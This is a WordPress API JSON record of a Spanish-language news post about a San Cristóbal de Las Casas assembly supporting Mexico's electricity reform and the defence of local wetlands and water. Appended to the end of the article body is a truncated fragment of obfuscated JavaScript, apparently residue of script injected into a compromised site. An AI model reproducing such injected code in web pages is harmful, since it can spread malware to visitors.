{"id":512,"date":"2022-03-12T02:36:01","date_gmt":"2022-03-12T02:36:01","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=512"},"modified":"2022-03-12T02:36:02","modified_gmt":"2022-03-12T02:36:02","slug":"en-san-cristobal-continua-apoyo-a-la-reforma-electrica","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=512","title":{"rendered":"En San Crist\u00f3bal contin\u00faa apoyo a la Reforma El\u00e9ctrica"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"514\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-11-at-2.18.52-PM-1024x576.jpeg\" alt=\"\" class=\"wp-image-514\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-11-at-2.18.52-PM-1024x576.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-11-at-2.18.52-PM-300x169.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-11-at-2.18.52-PM-768x432.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-11-at-2.18.52-PM-1536x864.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-11-at-2.18.52-PM.jpeg 1599w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"513\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-11-at-3.27.44-PM-1024x576.jpeg\" alt=\"\" class=\"wp-image-513\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-11-at-3.27.44-PM-1024x576.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-11-at-3.27.44-PM-300x169.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-11-at-3.27.44-PM-768x432.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-11-at-3.27.44-PM.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>11 de Marzo del 2022. San Crist\u00f3bal de Las Casas.- Integrantes del Consejo de la Zona Sur refrendaron su compromiso por la defendamos el agua, los humedales y la energ\u00eda para todos y todas, como para el pueblo de Chiapas y M\u00e9xico, esto durante la asamblea informativa para la Reforma El\u00e9ctrica, que se llev\u00f3 a cabo en la Universidad Intercultural de Chiapas (Unich) a iniciativa de la Diputada Federal, Adriana Bustamante Castellanos.<\/p>\n\n\n\n<p>\u201cVemos que la contrareforma el\u00e9ctrica,&nbsp; impulsada por Enrique Pe\u00f1a Nieto en el sexenio pasado, era para beneficiar a unos cuantos, es el caso del grupo FEMSA, Coca Cola, y que hoy saquean el agua de nuestra ciudad, al tener una planta embotelladora al poniente de la ciudad, poniendo en peligro a las presentes y futuras generaciones, adem\u00e1s pagar precios irrisorios por la luz que utiliza en sus Oxxos\u201d, dijo Juanita miembro del Consejo de la Zona Sur.<\/p>\n\n\n\n<p>Dej\u00f3 en claro que la lucha como sector organizado inicia con la defensa de los humedales, aunque los pol\u00edticos \u201cnos llamaron indios&#8221; que nos opon\u00edamos al desarrollo, ellos privilegian el dinero, y que siguen llev\u00e1ndose, pero nosotros ac\u00e1 seguimos, y seguiremos, hemos puesto la agenda en el cuidado del medio ambiente, del agua, con ello, los humedales, nuestros aliados los medios de comunicaci\u00f3n, y las redes sociales, hemos generado una sinergia entre ciudadan\u00eda, organizaciones, la academia y los pueblos originarios, que trasciende tiempo e historia, es decir conciencia\u201d.<\/p>\n\n\n\n<p>Durante su participaci\u00f3n en el evento al que adem\u00e1s estuvieron los diputados federales, Joaqu\u00edn Zebadua Alva, Mayra Alicia Mendoza \u00c1lvarez, Jorge Luis Llaven Abarca y Valeria Santiago Barrientos, la representante les ratific\u00f3 que el agua no se vende, \u201cse ama y se defiende, cobijado y respaldado por la casa de la interculturalidad y del di\u00e1logo, donde hoy nos encontramos, donde se reconoce al otro y la otra, donde las mujeres tambi\u00e9n somos el alma del movimiento, porque no puede haber cambio, sin nuestra participaci\u00f3n, nuestra lucha ambiental gestada desde hace m\u00e1s de 20 a\u00f1os, ha generado una sinergia que busca de algo similar, con la reforma energ\u00e9tica en bien del pa\u00eds\u201d.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n\n\n\n<p>Record\u00f3 que el 70 por ciento de agua para consumo humano de est\u00e1 ciudad, proviene principalmente del humedal de monta\u00f1a Mar\u00eda Eugenia, ubicado a un costado de la UNICH, seguidamente por La Kisst, y de importancia para la ciudad de San Crist\u00f3bal y luego el vital l\u00edquido llega a nuestras casas, por medio de las bombas que utilizan energ\u00eda el\u00e9ctrica, un binomio inseparable.<\/p>\n\n\n\n<p>\u201cProponemos a seguir investigando sobre el uso de las energ\u00edas renovables, y en un gobierno de la Cuarta Transformaci\u00f3n, es posible, adem\u00e1s evitar que las transnacionales controlen la energ\u00eda. Tenemos claro que est\u00e1 batalla es por la vida y el futuro, en particular por la recuperaci\u00f3n de la soberan\u00eda energ\u00e9tica, fundamental&nbsp; para las futuras generaciones, adem\u00e1s de disfrutar un ambiente sano, la salud y tener fuentes de agua, este \u00faltimo elemento, necesario para la generaci\u00f3n de la energ\u00eda el\u00e9ctrica\u201d, abund\u00f3.<\/p>\n\n\n\n<p>Por \u00faltimo, dej\u00f3 en claro que las mujeres y hombres de ma\u00edz, defensores de los humedales, y habitantes de las colonias de la zona sur de la cuenca del valle de Jovel, \u201cdecimos, s\u00ed,&nbsp; a la reforma el\u00e9ctrica\u201d.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez 11 de Marzo del 2022. San Crist\u00f3bal de Las Casas.- Integrantes del Consejo de la Zona Sur refrendaron su compromiso por la defendamos el agua, los humedales y la energ\u00eda para todos y todas, como para el pueblo de Chiapas y M\u00e9xico, esto durante la asamblea informativa para la Reforma El\u00e9ctrica, que se &hellip;<\/p>\n","protected":false},"author":2,"featured_media":514,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-512","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/512","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=512"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/512\/revisions"}],"predecessor-version":[{"id":515,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/512\/revisions\/515"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/514"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=512"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=512"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=512"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}